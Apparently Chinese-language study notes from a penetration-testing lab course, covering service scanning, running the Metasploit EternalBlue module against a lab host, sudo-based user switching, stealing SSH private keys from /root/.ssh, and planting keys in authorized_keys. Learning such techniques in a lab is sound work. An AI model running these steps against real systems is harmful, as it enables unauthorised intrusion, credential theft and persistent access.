渗透测试课程
流程
服务扫描:nmap、SMB、SNMP等
Web服务:GoBuster、ffuf等
在野漏洞利用:Metasploit、searchsploit
MetaSploit使用
启动
输入msfconsole
启动MetaSploit。搜索
可以使用search
命令进行搜索,如search exploit eternalblue
使用
找到exp了后可以用use
命令使用,如use exploit/windows/smb/ms17_010_psexec
设置
需要使用show options
进行设置,如set RHOSTS 10.10.10.40
和set LHOST tun0
。LHOST
代表本地主机,即攻击者机器的IP地址。RHOST
代表远程主机,即目标机器的IP地址。检查
运行前可以运行check
检查运行
运行run
或者exploit
开始exploit
一些用户切换和提权的小笔记
sudo -l
sudo -l 可以显示目前拥有什么sudo权限
1 | user1@ng-1401667-gettingstartedprivesc-hubgy-5dcd7dc5c8-7mb9m:~$ sudo -l |
这就显示user1有不输入密码使用user2的/bin/bash
的能力。直接sudo -u user2 /bin/bash
即可使用sudo权限切到user2的bash。
ssh
可以通过ssh来提权。如果有读权限,可以读/root/.ssh/
或/home/user/.ssh/
下的id_rsa
文件,就能够使用ssh以root或user的身份登录。如ssh root@10.10.10.10 -i id_rsa
,但要注意在登录时需要chmod 600 id_rsa
,让我们储存下来的私钥对于其他人来说不可见,不然会自动不使用这个私钥。
如果有写权限,可以把自己的私钥加在/home/user/.ssh/authorized_keys
或/root/.ssh/authorized_keys
文件后。
反向shell小笔记
反向shell可以通过Reverse Shell Cheat Sheet和Reverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python直接抄过来。